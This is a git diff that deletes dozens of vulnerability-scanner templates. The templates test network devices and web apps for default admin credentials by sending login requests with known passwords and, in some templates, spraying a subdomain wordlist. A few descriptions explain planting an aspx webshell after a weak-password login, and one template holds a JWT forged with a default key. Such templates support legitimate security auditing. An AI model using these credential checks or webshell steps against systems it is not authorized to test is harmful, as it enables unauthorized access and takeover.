- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /htdocs/login/login.lua HTTP/1.1
- Host: {{Subdomains}}
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
- Accept-Encoding: gzip, deflate
-
- username=admin&password=
- matchers-condition: and
- matchers:
- - type: word
- words:
- - '"redirect": "/htdocs/pages/main/main.lsp"'
- - '"error": ""'
- condition: and
- - type: status
- status:
- - 200
diff --git a/tmp/default/hp-switch-default-login.yaml b/tmp/default/hp-switch-default-login.yaml
deleted file mode 100644
index 6f90d4b482..0000000000
--- a/tmp/default/hp-switch-default-login.yaml
+++ /dev/null
@@ -1,35 +0,0 @@
-id: hp-switch-default-login
-info:
- name: HP 1820-8G Switch J9979A Default Credential
- author: pussycat0x
- severity: high
- reference: https://support.hpe.com/hpesc/public/docDisplay?docId=a00077779en_us&docLocale=en_US
- metadata:
- fofa-dork: 'HP 1820-8G Switch J9979A'
- tags: default-login,hp
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /htdocs/login/login.lua HTTP/1.1
- Host: {{Subdomains}}
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
- Accept-Encoding: gzip, deflate
-
- username=admin&password=
- matchers-condition: and
- matchers:
- - type: word
- words:
- - '"redirect": "/htdocs/pages/main/main.lsp"'
- - '"error": ""'
- condition: and
-
- - type: status
- status:
- - 200
diff --git a/tmp/default/huawei-HG532e-default-router-login.yaml b/tmp/default/huawei-HG532e-default-router-login.yaml
deleted file mode 100644
index 71e585125e..0000000000
--- a/tmp/default/huawei-HG532e-default-router-login.yaml
+++ /dev/null
@@ -1,43 +0,0 @@
-id: huawei-HG532e-default-login
-
-info:
- name: Huawei HG532e Default Credential
- author: pussycat0x
- severity: high
- description: Huawei HG532e default admin credentials were discovered.
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
- cvss-score: 8.3
- cwe-id: CWE-522
- metadata:
- max-request: 1
- shodan-query: http.html:"HG532e"
- tags: default-login,huawei
-
-http:
- - raw:
- - |
- POST /index/login.cgi HTTP/1.1
- Host: {{Hostname}}
- Cookie: Language=en; FirstMenu=Admin_0; SecondMenu=Admin_0_0; ThirdMenu=Admin_0_0_0
- Content-Type: application/x-www-form-urlencoded
-
- Username=user&Password=MDRmODk5NmRhNzYzYjdhOTY5YjEwMjhlZTMwMDc1NjllYWYzYTYzNTQ4NmRkYWIyMTFkNTEyYzg1YjlkZjhmYg%3D%3D
-
- matchers-condition: and
- matchers:
- - type: word
- part: header
- words:
- - 'Set-Cookie: SessionID'
-
- - type: word
- part: body
- words:
- - "replace"
-
- - type: status
- status:
- - 200
-
-# digest: 4a0a0047304502210098853593bd79906f1fc55c1386f724501e413fa0160f1001597c53617c79af2a02200e4fa649e43eba6e6bf28db68abe93584b5cf961542e2d2afe5bdf55ddc3c6d7:922c64590222798bb761d5b6d8e72950
diff --git a/tmp/default/hue-default-credential.yaml b/tmp/default/hue-default-credential.yaml
deleted file mode 100644
index d9f73b4d76..0000000000
--- a/tmp/default/hue-default-credential.yaml
+++ /dev/null
@@ -1,67 +0,0 @@
-id: hue-default-credential
-
-info:
- name: Cloudera Hue Default Admin Login
- author: For3stCo1d
- severity: high
- description: Cloudera Hue default admin credentials were discovered.
- reference:
- - https://github.com/cloudera/hue
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
- cvss-score: 8.3
- cwe-id: CWE-522
- metadata:
- max-request: 8
- shodan-query: title:"Hue - Welcome to Hue"
- tags: hue,default-login,oss,cloudera
-
-http:
- - raw:
- - |
- GET /hue/accounts/login?next=/ HTTP/1.1
- Host: {{Hostname}}
- - |
- POST /hue/accounts/login HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
-
- csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username={{user}}&password={{pass}}&next=%2F
-
- attack: pitchfork
- payloads:
- user:
- - admin
- - hue
- - hadoop
- - cloudera
- pass:
- - admin
- - hue
- - hadoop
- - cloudera
-
- extractors:
- - type: regex
- name: csrfmiddlewaretoken
- part: body
- internal: true
- group: 1
- regex:
- - name='csrfmiddlewaretoken' value='(.+?)'
- stop-at-first-match: true
-
- matchers-condition: and
- matchers:
- - type: dsl
- dsl:
- - contains(tolower(body_1), 'welcome to hue')
- - contains(tolower(header_2), 'csrftoken=')
- - contains(tolower(header_2), 'sessionid=')
- condition: and
-
- - type: status
- status:
- - 302
-
-# digest: 4a0a00473045022100f246e397d587a35d70dc6a427c61a8c01fccad74514da7b4e34e6ef28624c22902202f545802076fbc9bdfee5f7e04dcfea08004f131c0ba9ec21e92fba257c171a4:922c64590222798bb761d5b6d8e72950
diff --git a/tmp/default/hybris-default-login.yaml b/tmp/default/hybris-default-login.yaml
deleted file mode 100644
index bdb6851601..0000000000
--- a/tmp/default/hybris-default-login.yaml
+++ /dev/null
@@ -1,65 +0,0 @@
-id: hybris-default-login
-
-info:
- name: Hybris - Default Login
- author: princechaddha
- severity: high
- description: Hybris contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
- cvss-score: 8.3
- cwe-id: CWE-522
- metadata:
- verified: true
- shodan-query: title:"Hybris"
- tags: default-login,hybris
-
-http:
- - raw:
- - |
- GET /login HTTP/1.1
- Host: {{Hostname}}
-
- - |
- POST /j_spring_security_check HTTP/1.1
- Host: {{Hostname}}
- Origin: {{BaseURL}}
- Content-Type: application/x-www-form-urlencoded
- Referer: {{BaseURL}}login
-
- j_username={{username}}&j_password={{password}}&_csrf={{csrftoken}}
-
- - |
- GET / HTTP/1.1
- Host: {{Hostname}}
-
- attack: pitchfork
- payloads:
- username:
- - admin
- password:
- - nimda
-
- cookie-reuse: true
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "hybris administration console"
- - "You're Administrator"
- condition: and
-
- - type: status
- status:
- - 200
-
- extractors:
- - type: regex
- name: csrftoken
- internal: true
- part: body
- group: 1
- regex:
- - ''
-
-# Enhanced by md on 2023/01/06
diff --git a/tmp/default/ibm-mqseries-default-login-8108.yaml b/tmp/default/ibm-mqseries-default-login-8108.yaml
deleted file mode 100644
index 1212e832be..0000000000
--- a/tmp/default/ibm-mqseries-default-login-8108.yaml
+++ /dev/null
@@ -1,51 +0,0 @@
-id: ibm-mqseries-default-login
-
-info:
- name: IBM MQSeries Web Console Default Login
- author: righettod
- severity: high
- description: IBM MQ and REST API default admin credentials were discovered. An unauthenticated, remote attacker can exploit this gain privileged or administrator access to the system.
- tags: ibm,default-login
- reference:
- - https://github.com/ibm-messaging/mq-container/blob/master/etc/mqm/mq.htpasswd
- - https://vulners.com/nessus/IBM_MQ_DEFAULT_CREDENTIALS.NASL
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
- cvss-score: 8.3
- cve-id:
- cwe-id: CWE-522
-
-requests:
- - raw:
- - |
- POST /ibmmq/console/j_security_check HTTP/1.1
- Host: {{Hostname}}
- Origin: {{RootURL}}
- Content-Type: application/x-www-form-urlencoded
- Referer: {{RootURL}}/ibmmq/console/login.html
-
- j_username={{username}}&j_password={{password}}
-
- attack: pitchfork
- payloads:
- username:
- - admin
- - app
- - mqadmin
- password:
- - passw0rd
- - passw0rd
- - mqadmin
-
- matchers-condition: and
- matchers:
- - type: word
- part: header
- words:
- - "LtpaToken2_"
-
- - type: status
- status:
- - 302
-
-# Enhanced by mp on 2022/03/10
diff --git a/tmp/default/ibm-storage-default-password.yaml b/tmp/default/ibm-storage-default-password.yaml
deleted file mode 100644
index 4606dbf020..0000000000
--- a/tmp/default/ibm-storage-default-password.yaml
+++ /dev/null
@@ -1,16 +0,0 @@
-id: ibm-storage-default-password
-
-info:
- name: IBM Storage Management Default Login
- author: madrobot
- severity: high
- verified: false
-
-rules:
- r0:
- request:
- method: POST
- path: /0/Authenticate
- body: j_username=admin&j_password=admin&continue=&submit=submit+form
- expression: response.status == 200 && response.raw_header.bcontains(b'JSESSIONID') && response.body.bcontains(b'/0/Console') && response.body.bcontains(b'Property of IBM')
-expression: r0()
\ No newline at end of file
diff --git a/tmp/default/idemia-biometrics-default-login-8140.yaml b/tmp/default/idemia-biometrics-default-login-8140.yaml
deleted file mode 100644
index 5747d95ee9..0000000000
--- a/tmp/default/idemia-biometrics-default-login-8140.yaml
+++ /dev/null
@@ -1,35 +0,0 @@
-id: idemia-biometrics-default-login
-info:
- name: IDEMIA BIOMetrics Default Login
- author: Techryptic (@Tech)
- severity: high
- description: Default Login of password=12345 on IDEMIA BIOMetrics application.
- reference: https://www.google.com/search?q=idemia+password%3D+"12345"
- tags: idemia,biometrics,default-login
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /cgi-bin/login.cgi HTTP/1.1
- Host: {{Subdomains}}
- Accept-Encoding: gzip, deflate
-
- password=12345
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "session_id="
- - "resource"
- condition: and
- - type: word
- words:
- - "Invalid Password"
- part: body
- negative: true
- - type: status
- status:
- - 200
diff --git a/tmp/default/idemia-biometrics-default-login.yaml b/tmp/default/idemia-biometrics-default-login.yaml
deleted file mode 100644
index 3fe5463cdc..0000000000
--- a/tmp/default/idemia-biometrics-default-login.yaml
+++ /dev/null
@@ -1,40 +0,0 @@
-id: idemia-biometrics-default-login
-
-info:
- name: IDEMIA BIOMetrics Default Login
- author: Techryptic (@Tech)
- severity: high
- description: Default Login of password=12345 on IDEMIA BIOMetrics application.
- reference: https://www.google.com/search?q=idemia+password%3D+"12345"
- tags: idemia,biometrics,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /cgi-bin/login.cgi HTTP/1.1
- Host: {{Subdomains}}
- Accept-Encoding: gzip, deflate
-
- password=12345
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "session_id="
- - "resource"
- condition: and
-
- - type: word
- words:
- - "Invalid Password"
- part: body
- negative: true
-
- - type: status
- status:
- - 200
\ No newline at end of file
diff --git a/tmp/default/iptime-default-login.yaml b/tmp/default/iptime-default-login.yaml
deleted file mode 100644
index 0cfc4b4f3d..0000000000
--- a/tmp/default/iptime-default-login.yaml
+++ /dev/null
@@ -1,48 +0,0 @@
-id: iptime-default-login
-
-info:
- name: ipTIME Default Login
- author: gy741
- severity: high
- description: ipTIME default admin credentials were discovered.
- reference:
- - https://www.freewebtools.com/IPTIME/
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
- cvss-score: 8.3
- cwe-id: CWE-522
- metadata:
- max-request: 1
- tags: iptime,default-login
-
-http:
- - raw:
- - |
- POST /sess-bin/login_handler.cgi HTTP/1.1
- Host: {{Hostname}}
- Referer: {{BaseURL}}/sess-bin/login_session.cgi
-
- username={{username}}&passwd={{password}}
-
- payloads:
- username:
- - admin
- password:
- - admin
- attack: pitchfork
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
-
- - type: word
- words:
- - "setCookie"
- - "efm_session_id"
- - "login.cgi"
- part: body
- condition: and
-
-# digest: 480a00453043021f48378eaeeba6c7b9c45cbe0a34e4f50162ecf7871700bb62a1183045ce49b402205d975fa7eabd5ad242a0eee4b7894233564acfe9e9b04ee5775e4d4ae57142e1:922c64590222798bb761d5b6d8e72950
diff --git a/tmp/default/jboss-default-password.yaml b/tmp/default/jboss-default-password.yaml
deleted file mode 100644
index 0384337549..0000000000
--- a/tmp/default/jboss-default-password.yaml
+++ /dev/null
@@ -1,42 +0,0 @@
-id: jboss-default-password
-
-info:
- name: JBoss JMX Console Weak Credential Discovery
- author: paradessia
- severity: high
- verified: true
- description: |
- 利用jboss.deployment部署shell
- fofa: "jmx-console"
- reference:
- - https://xz.aliyun.com/t/6103
-
-rules:
- r0:
- request:
- method: GET
- path: /jmx-console/
- expression: response.status == 200 && response.body.bcontains(b"jboss.management.local") && response.body.bcontains(b"jboss.web")
- r1:
- request:
- method: GET
- path: /jmx-console/
- headers:
- Authorization: "Basic YWRtaW46YWRtaW4="
- expression: response.status == 200 && response.body.bcontains(b'JMImplementation')
- r2:
- request:
- method: GET
- path: /jmx-console/
- headers:
- Authorization: "Basic cm9vdDpyb290"
- expression: response.status == 200 && response.body.bcontains(b'JMImplementation')
- r3:
- request:
- method: GET
- path: /jmx-console/
- headers:
- Authorization: "Basic YWRtaW46MTIzNDU2"
- expression: response.status == 200 && response.body.bcontains(b'JMImplementation')
-expression: r0() || r1() || r2() || r3()
-
diff --git a/tmp/default/jenkins-default-pwd.yaml b/tmp/default/jenkins-default-pwd.yaml
deleted file mode 100644
index 643c19094e..0000000000
--- a/tmp/default/jenkins-default-pwd.yaml
+++ /dev/null
@@ -1,36 +0,0 @@
-id: jenkins-default-pwd
-
-info:
- name: Jenkins Default Password
- author: zan8in
- severity: high
- verified: true
- description: app="Jenkins"
-
-rules:
- r0:
- request:
- method: GET
- path: /login
- expression: |
- response.status == 200 && response.body.bcontains(b'Sign in [Jenkins]')
- stop_if_mismatch: true
- r1:
- request:
- method: POST
- path: /j_spring_security_check
- body: |
- j_username=admin&j_password=admin&from=&Submit=Sign+in
- expression: |
- response.status == 302 && !response.headers["location"].contains("loginError")
- stop_if_match: true
- r2:
- request:
- method: POST
- path: /j_spring_security_check
- body: |
- j_username=jenkins&j_password=password&from=&Submit=Sign+in
- expression: |
- response.status == 302 && response.body.bcontains(b'工作台 [Jenkins]')
- stop_if_match: true
-expression: r0() && (r1() || r2())
diff --git a/tmp/default/jinher-oa-c6-default-password.yaml b/tmp/default/jinher-oa-c6-default-password.yaml
deleted file mode 100644
index df322586c0..0000000000
--- a/tmp/default/jinher-oa-c6-default-password.yaml
+++ /dev/null
@@ -1,17 +0,0 @@
-name: poc-yaml-jinher-oa-c6-default-password
-manual: true
-transport: http
-rules:
- jiner:
- request:
- cache: true
- method: POST
- path: /c6/Jhsoft.Web.login/AjaxForLogin.aspx
- body:
- type=login&loginCode=YWRtaW4=&&pwd=MDAwMDAw&
- expression: response.status == 200 && response.headers["Set-Cookie"].contains("SessionIDAdmin=") && response.body.bcontains(b"\xcf\xb5\xcd\xb3\xb9\xdc\xc0\xed\xd4\xb1\x7c") && response.body.bcontains(b"\xc4\xfa\xba\xc3\x7c\x7c\x7c") # nolint[:cellint]
-expression: jiner()
-detail:
- author: iak3ec(https://github.com/nu0l)
- links:
- - https://github.com/nu0l/poc-wiki/blob/main/%E9%87%91%E5%92%8COA-C6-default-password.md
diff --git a/tmp/default/jinher-oa-c6-default-password.yml b/tmp/default/jinher-oa-c6-default-password.yml
deleted file mode 100644
index faedace04b..0000000000
--- a/tmp/default/jinher-oa-c6-default-password.yml
+++ /dev/null
@@ -1,17 +0,0 @@
-name: poc-yaml-jinher-oa-c6-default-password
-manual: true
-transport: http
-rules:
- jiner:
- request:
- cache: true
- method: POST
- path: /c6/Jhsoft.Web.login/AjaxForLogin.aspx
- body:
- type=login&loginCode=YWRtaW4=&&pwd=MDAwMDAw&
- expression: response.status == 200 && response.headers["Set-Cookie"].contains("SessionIDAdmin=") && response.body.bcontains(b"\xcf\xb5\xcd\xb3\xb9\xdc\xc0\xed\xd4\xb1\x7c") && response.body.bcontains(b"\xc4\xfa\xba\xc3\x7c\x7c\x7c") # nolint[:cellint]
-expression: jiner()
-detail:
- author: iak3ec(https://github.com/nu0l)
- links:
- - https://github.com/nu0l/poc-wiki/blob/main/%E9%87%91%E5%92%8COA-C6-default-password.md
diff --git a/tmp/default/jinher-oa-default-login.yaml b/tmp/default/jinher-oa-default-login.yaml
deleted file mode 100644
index a688da8636..0000000000
--- a/tmp/default/jinher-oa-default-login.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: jinher-oa-default-login
-
-info:
- name: Jinher oa C6 Default Password
- author: ritikchaddha
- severity: high
- description: |
- Jinher-OA C6 default administrator account credential.
- 使用弱密码登录,admin:000000。访问写入大马路径,写入aspx大马->点击保存,写入大马:
- /C6/JHSoft.Web.Portal/EditMain.aspx?id=1.aspx
- reference:
- - https://github.com/nu0l/poc-wiki/blob/main/%E9%87%91%E5%92%8COA-C6-default-password.md
- - https://mp.weixin.qq.com/s/ZMJ1XdxThyKNvjvg4Ey90Q
-
-set:
- base64user: "base64('admin')"
- base64pass: "base64('000000')"
-rules:
- r0:
- request:
- method: POST
- path: /c6/Jhsoft.Web.login/AjaxForLogin.aspx
- body: |
- type=login&loginCode={{base64user}}&pwd={{base64pass}}&
- expression: response.status == 200 && response.body.bcontains(b'\xcf\xb5\xcd\xb3\xb9\xdc\xc0\xed\xd4\xb1\x7c') && response.body.bcontains(b'\xc4\xfa\xba\xc3\x7c\x7c\x7c') && response.raw_header.bcontains(b'SessionIDAdmin=')
-expression: r0()
\ No newline at end of file
diff --git a/tmp/default/jmx-default-login.yaml b/tmp/default/jmx-default-login.yaml
deleted file mode 100644
index 4424453387..0000000000
--- a/tmp/default/jmx-default-login.yaml
+++ /dev/null
@@ -1,53 +0,0 @@
-id: jmx-default-login
-
-info:
- name: JBoss JMX Console Weak Credential Discovery
- author: paradessia
- severity: high
- description: JBoss JMX Console default login information was discovered.
- reference:
- - https://docs.jboss.org/jbossas/6/Admin_Console_Guide/en-US/html/Administration_Console_User_Guide-Accessing_the_Console.html
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
- cvss-score: 8.3
- cwe-id: CWE-522
- metadata:
- max-request: 28
- tags: jboss,jmx,default-login
-
-http:
- - raw:
- - |
- GET /jmx-console/ HTTP/1.1
- Host: {{Hostname}}
- - |
- GET /jmx-console/ HTTP/1.1
- Host: {{Hostname}}
- Authorization: Basic {{base64(user + ':' + pass)}}
-
- attack: clusterbomb
- payloads:
- user:
- - admin
- - root
- pass:
- - admin
- - 12345
- - 123456
- - 1234
- - 123456789
- - 123qwe
- - root
- req-condition: true
-
- matchers-condition: and
- matchers:
- - type: dsl
- dsl:
- - "!contains(body_1, 'JMImplementation') && contains(body_2, 'JMImplementation')"
-
- - type: status
- status:
- - 200
-
-# digest: 4a0a00473045022100fcbf9d1b11ac4631f88f64f7d1fb152f8b47cc9a2004da731df4f598f5ef14a4022006ec683f098c6f43996dfc9d6283dc10b7cfc523d10ab8f669cb7b631b009adb:922c64590222798bb761d5b6d8e72950
diff --git a/tmp/default/jmx-default-password.yaml b/tmp/default/jmx-default-password.yaml
deleted file mode 100644
index 317f1615b9..0000000000
--- a/tmp/default/jmx-default-password.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: jmx-default-password
-
-info:
- name: JBoss JMX Console Weak Credential
- author: paradessia
- severity: high
- verified: true
-
-set:
- user1: "base64('admin:admin')"
- user2: "base64('root:root')"
-rules:
- r0:
- request:
- method: GET
- path: /jmx-console/
- headers:
- Authorization: Basic {{user1}}
- expression: response.status == 200 && response.raw_header.bcontains(b'JSESSIONID') && response.body.bcontains(b'JBoss JMX Management Console')
- r1:
- request:
- method: GET
- path: /jmx-console/
- headers:
- Authorization: Basic {{user2}}
- expression: response.status == 200 && response.raw_header.bcontains(b'JSESSIONID') && response.body.bcontains(b'JBoss JMX Management Console')
-expression: r0() || r1()
\ No newline at end of file
diff --git a/tmp/default/jupyterhub-default-login.yaml b/tmp/default/jupyterhub-default-login.yaml
deleted file mode 100644
index a109287373..0000000000
--- a/tmp/default/jupyterhub-default-login.yaml
+++ /dev/null
@@ -1,49 +0,0 @@
-id: jupyterhub-default-login
-
-info:
- name: Jupyterhub - Default Admin Discovery
- author: For3stCo1d
- severity: high
- description: Jupyterhub default admin credentials were discovered.
- reference:
- - https://github.com/jupyterhub/jupyterhub
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
- cvss-score: 8.3
- cwe-id: CWE-522
- metadata:
- max-request: 2
- shodan-query: http.title:"JupyterHub"
- tags: jupyterhub,default-login
-
-http:
- - raw:
- - |
- POST /hub/login?next= HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
-
- username={{user}}&password={{pass}}
-
- attack: pitchfork
- payloads:
- user:
- - admin
- - jovyan
- pass:
- - admin
- - jupyter
-
- matchers-condition: and
- matchers:
- - type: dsl
- dsl:
- - contains(tolower(header), 'jupyterhub-session-id=')
- - contains(tolower(header), 'jupyterhub-hub-login=')
- condition: and
-
- - type: status
- status:
- - 302
-
-# digest: 490a004630440220504fe0f5cbc16b5c44933010b0b1e5899cd4f1c787c4ed183e7f592b74f5ac8d022050cf99623155e80501e1ae49981183cd9ad3b50508b8b57927990894338280c8:922c64590222798bb761d5b6d8e72950
diff --git a/tmp/default/k8s-default-namespace-used.yaml b/tmp/default/k8s-default-namespace-used.yaml
deleted file mode 100644
index 0b43dc37db..0000000000
--- a/tmp/default/k8s-default-namespace-used.yaml
+++ /dev/null
@@ -1,49 +0,0 @@
-id: k8s-default-namespace-used
-
-info:
- name: Default Namespace Usage in Deployments
- author: princechaddha
- severity: high
- description: Checks if Kubernetes Deployments are using the default namespace, which can lead to security risks and mismanagement issues.
- impact: |
- Using the default namespace for Kubernetes Deployments can increase security risks as it might allow broader access than necessary. It also complicates resource management across multiple teams and applications.
- remediation: |
- Avoid using the default namespace for Kubernetes Deployments. Create and specify dedicated namespaces tailored to specific applications or teams to enhance security and manage resources effectively.
- reference:
- - https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
- metadata:
- max-request: 2
- tags: cloud,devops,kubernetes,k8s,devsecops,namespaces,k8s-cluster-security
-flow: |
- code(1);
- for (let deployment of template.items) {
- set("deployment", deployment)
- javascript(1);
- }
-
-self-contained: true
-code:
- - engine:
- - sh
- - bash
- source: kubectl get deployments --all-namespaces --output=json
- extractors:
- - type: json
- name: items
- internal: true
- json:
- - '.items[]'
-
-javascript:
- - code: |
- deployment = JSON.parse(template.deployment);
- if (deployment.metadata.namespace.toLowerCase() === "default") {
- let result = (`Deployment '${deployment.metadata.name}' is using the default namespace, which is not recommended.`);
- Export(result);
- }
-
- extractors:
- - type: dsl
- dsl:
- - response
-# digest: 4a0a00473045022100cb1a8cc055b7e8807ef5dad291c1259028e3d518155d9340c1fe72cb8a6cfad902201644f419892fe61eeb0bccd7e89bf5e57e87cdfb23374f91551df421236c4585:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/tmp/default/kafka-center-default-password.yaml b/tmp/default/kafka-center-default-password.yaml
deleted file mode 100644
index 365fb2dd36..0000000000
--- a/tmp/default/kafka-center-default-password.yaml
+++ /dev/null
@@ -1,22 +0,0 @@
-id: kafka-center-default-password
-
-info:
- name: Apache Kafka Center Default Password
- author: dhiyaneshDK
- severity: high
- verified: true
- description: |
- shodan: http.title:"Kafka Center"
- fofa: title="Kafka Center"
-
-rules:
- r0:
- request:
- method: POST
- path: /login/system
- headers:
- Content-Type: application/json
- body: |
- {"name":"admin","password":"admin","checkbox":false}
- expression: response.status == 200 && response.content_type.contains('application/json') && response.body.bcontains(b'"code":200') && response.body.bcontains(b'"name":"admin"') && response.body.bcontains(b'"realName":null') && response.body.bcontains(b'"teamIDs":null')
-expression: r0()
\ No newline at end of file
diff --git a/tmp/default/kingsoft-v8-default-password.yaml b/tmp/default/kingsoft-v8-default-password.yaml
deleted file mode 100644
index 5e5f610048..0000000000
--- a/tmp/default/kingsoft-v8-default-password.yaml
+++ /dev/null
@@ -1,18 +0,0 @@
-id: kingsoft-v8-default-password
-
-info:
- name: Kingsoft V8 Default Password
- author: B1anda0(https://github.com/B1anda0)
- severity: high
- verified: false
-
-rules:
- r0:
- request:
- method: POST
- path: /inter/ajax.php?cmd=get_user_login_cmd
- body: '{"get_user_login_cmd":{"name":"admin","password":"21232f297a57a5a743894a0e4a801fc3"}}'
- follow_redirects: true
- expression: response.status == 200 && response.body.ibcontains(b"admin") && response.body.ibcontains(b"usersession")
-expression: r0()
-
diff --git a/tmp/default/kingsoft-v8-default-password.yml b/tmp/default/kingsoft-v8-default-password.yml
deleted file mode 100644
index 8d8c6cc252..0000000000
--- a/tmp/default/kingsoft-v8-default-password.yml
+++ /dev/null
@@ -1,17 +0,0 @@
-name: poc-yaml-kingsoft-v8-default-password
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: POST
- path: /inter/ajax.php?cmd=get_user_login_cmd
- body: '{"get_user_login_cmd":{"name":"admin","password":"21232f297a57a5a743894a0e4a801fc3"}}'
- follow_redirects: true
- expression: response.status == 200 && response.body.bcontains(b"ADMIN") && response.body.bcontains(b"userSession")
-expression: r0()
-detail:
- author: B1anda0(https://github.com/B1anda0)
- links:
- - https://idc.wanyunshuju.com/aqld/2123.html
diff --git a/tmp/default/known-default-account.yaml b/tmp/default/known-default-account.yaml
deleted file mode 100644
index c545902e59..0000000000
--- a/tmp/default/known-default-account.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: known-default-account
-
-info:
- name: Netgate Known Default Account - Detect
- author: pussycat0x
- severity: info
- description: |
- Netgate configured known default accounts are recommended to be deleted. In order to attempt access to known devices' platforms, an attacker can use the available database of the known default accounts for each platform or operating system. Known default accounts are often, but not limited to, 'admin'.
- reference: |
- - https://docs.netgate.com/pfsense/en/latest/usermanager/defaults.html
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0.0
- cwe-id: CWE-200
- tags: audit,config,file,firewall,pfsense
-
-file:
- - extensions:
- - xml
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "admin"
- - ""
- - "user-shell-access"
- condition: and
-
-# Enhanced by md on 2023/05/04
diff --git a/tmp/default/konga-default-jwt-key.yaml b/tmp/default/konga-default-jwt-key.yaml
deleted file mode 100644
index a924e1a968..0000000000
--- a/tmp/default/konga-default-jwt-key.yaml
+++ /dev/null
@@ -1,20 +0,0 @@
-id: konga-default-jwt-key
-
-info:
- name: KONGA Arbitrary user login vulnerability
- author: wys
- severity: high
- verified: true
- description: The default key of Konga JWT is oursecret, which can forge arbitrary user permissions
- reference:
- - https://mp.weixin.qq.com/s/8guU2hT3wE2puEztdGqZQg
-
-rules:
- r0:
- request:
- method: GET
- path: /api/user
- headers:
- authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.MQ.gSssTBEVe6X9aFEd0H_tt8kk2u7df90W1eOzNRnrsQ4
- expression: response.status == 200 && response.body.bcontains(b'"createdUser":') && response.body.bcontains(b'"username":') && response.body.bcontains(b'"activationToken":')
-expression: r0()
\ No newline at end of file
diff --git a/tmp/default/lighttpd-default-8628.yaml b/tmp/default/lighttpd-default-8628.yaml
deleted file mode 100644
index 7e7fce73d4..0000000000
--- a/tmp/default/lighttpd-default-8628.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: lighttpd-default
-info:
- name: lighttpd Default Page
- author: dhiyaneshDK
- severity: info
- reference: https://www.shodan.io/search?query=http.title%3A%22Powered+by+lighttpd%22
- tags: tech
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET / HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers:
- - type: word
- words:
- - "Powered by lighttpd"
- - type: status
- status:
- - 200
diff --git a/tmp/default/lutron-iot-default-login-8674.yaml b/tmp/default/lutron-iot-default-login-8674.yaml
deleted file mode 100644
index 0cf0fd1ff1..0000000000
--- a/tmp/default/lutron-iot-default-login-8674.yaml
+++ /dev/null
@@ -1,34 +0,0 @@
-id: lutron-iot-default-login
-info:
- name: Lutron IOT Device Default Login
- reference: https://www.lutron.com
- author: geeknik
- severity: high
- tags: iot,default-login,lutron
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /login?login=lutron&password=lutron HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "LUTRON"
- - ">DeviceIP"
- - ">Get Database Info as XML"
- condition: and
- - type: word
- part: header
- words:
- - "text/html"
- - type: status
- status:
- - 200
diff --git a/tmp/default/mantisbt-default-credential.yaml b/tmp/default/mantisbt-default-credential.yaml
deleted file mode 100644
index 079862ba31..0000000000
--- a/tmp/default/mantisbt-default-credential.yaml
+++ /dev/null
@@ -1,47 +0,0 @@
-id: mantisbt-default-credential
-
-info:
- name: MantisBT Default Admin Login
- author: For3stCo1d
- severity: high
- description: A MantisBT default admin login was discovered.
- reference:
- - https://mantisbt.org/
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
- cvss-score: 8.3
- cwe-id: CWE-522
- metadata:
- max-request: 1
